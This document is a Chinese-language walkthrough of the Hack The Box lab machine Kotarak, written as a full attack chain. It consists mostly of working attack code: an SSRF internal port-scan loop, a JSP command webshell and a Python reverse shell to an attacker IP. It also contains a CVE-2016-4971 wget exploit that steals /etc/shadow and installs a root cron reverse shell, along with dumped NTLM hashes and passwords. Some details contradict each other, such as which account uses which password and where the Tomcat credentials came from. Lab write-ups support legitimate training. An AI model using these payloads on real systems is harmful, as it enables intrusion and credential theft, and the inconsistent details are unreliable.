[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据库文件恢复+TRP00F 跳关+authbind权限提升+wget-RCE权限提升

字数 1116 2025-08-20 18:18:05

Kotarak渗透测试实战教学文档

1. 信息收集阶段

1.1 初始扫描

使用Nmap进行端口扫描：

nmap -p- 10.10.10.55 --min-rate 10000 -sC -sV

发现开放端口：

22/tcp: OpenSSH 7.2p2 Ubuntu
8080/tcp: Apache Tomcat 8.5.5
60000/tcp: 未知服务

1.2 目录爆破

使用feroxbuster对60000端口进行目录爆破：

feroxbuster --url http://10.10.10.55:60000

2. SSRF漏洞利用

2.1 端口扫描

发现60000端口存在SSRF漏洞，可用于内部端口扫描：

time for i in {1..65535}; do 
  res=$(curl -s "http://10.10.10.55:60000/url.php?path=http%3A%2F%2F127.0.0.1%3A${i}"); 
  len=$(echo $res | wc -w); 
  if [ "$len" -gt "0" ]; then 
    echo -n "${i}: "; 
    echo $res | tr -d "\r" | head -1 | cut -c-100; 
  fi; 
done

发现888端口有响应，访问：

view-source:http://10.10.10.55:60000/url.php?path=http%3a%2f%2f127.0.0.1%3a888%3fdoc%3dbackup

获取到Tomcat凭据：

用户名: admin
密码: 3@g01PdhB!

3. Tomcat管理界面利用

3.1 上传WAR后门

访问Tomcat管理界面：

http://10.10.10.55:8080/manager/html

使用获取的凭据登录，上传WAR后门。

创建WAR文件的脚本：

#!/bin/sh
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp
rm -rf wshell
rm -f wshell.war
mkdir wshell
cp index.jsp wshell/
cd wshell
jar -cvf ../wshell.war *

3.2 反向Shell

上传反向Shell的JSP文件(rev.jsp)：

<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>

Python反向Shell代码：

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.12",10032));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")

4. NTDS.dit数据库恢复

4.1 下载数据库文件

通过Webshell访问：

http://10.10.10.55:8080/wshell/index.jsp?sort=1&dir=%2fhome%2ftomcat%2fto_archive%2fpentest_data

下载两个关键文件：

20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

4.2 提取哈希

使用impacket-secretsdump提取哈希：

impacket-secretsdump -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin LOCAL

获取的哈希值：

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

4.3 破解哈希

使用在线破解工具(如crackstation.net)破解哈希，获得：

Administrator: f16tomcat!
atanas: Password123!

5. 权限提升

5.1 切换到atanas用户

su atanas
密码: f16tomcat!

获取user flag:

93f844f50491ef797c9c1b601b4bece8

5.2 TRP00F漏洞利用

使用TRP00F工具进行权限提升：

python3 trp00f.py --lhost 10.10.16.12 --lport 10012 --rhost 10.10.16.12 --rport 10011 --http 1111

选择利用pkexec漏洞。

5.3 Wget漏洞利用(CVE-2016-4971)

5.3.1 准备恶意.wgetrc文件

echo "post_file = /etc/shadow" > .wgetrc
echo "output_document = /etc/cron.d/wget-root-shell" >> .wgetrc

5.3.2 启动FTP服务器

python -m pyftpdlib -p 21 -w

5.3.3 利用脚本

# wget-exploit.py
# CVE-2016-4971
import SimpleHTTPServer
import SocketServer
import socket;

class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        # This takes care of sending .wgetrc
        print "We have a volunteer requesting " + self.path + " by GET :)\n"
        if "Wget" not in self.headers.getheader('User-Agent'):
            print "But it's not a Wget :( \n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return
        
        print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
        self.send_response(301)
        new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
        print "Sending redirect to %s \n"%(new_path)
        self.send_header('Location', new_path)
        self.end_headers()

    def do_POST(self):
        # In here we will receive extracted file and install a PoC cronjob
        print "We have a volunteer requesting " + self.path + " by POST :)\n"
        if "Wget" not in self.headers.getheader('User-Agent'):
            print "But it's not a Wget :( \n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return
        
        content_len = int(self.headers.getheader('content-length', 0))
        post_body = self.rfile.read(content_len)
        print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
        
        print "Sending back a cronjob script as a thank-you for the file..."
        print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(ROOT_CRON)
        print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
        return

HTTP_LISTEN_IP = '10.0.3.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '10.10.16.12'
FTP_PORT = 21
ROOT_CRON = """* * * * * root bash -c 'bash -i >& /dev/tcp/10.10.16.12/10099 0>&1' \n"""

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print "Ready? Is your FTP server running?"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
    print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
    print "FTP is down :( Exiting."
    exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
handler.serve_forever()

5.3.4 执行利用

authbind python2 wget-exploit.py

等待约4分钟后获取root权限。

获取root flag:

950d1425795dfd38272c93ccbb63ae2c

6. 关键点总结

通过SSRF漏洞发现内部服务
利用Tomcat默认凭据获取初始访问权限
上传Webshell获取反向Shell
恢复NTDS.dit数据库并提取哈希
使用TRP00F工具进行权限提升
利用Wget漏洞(CVE-2016-4971)获取root权限

整个渗透测试过程展示了从信息收集到最终获取root权限的完整链条，涉及多种漏洞利用技术。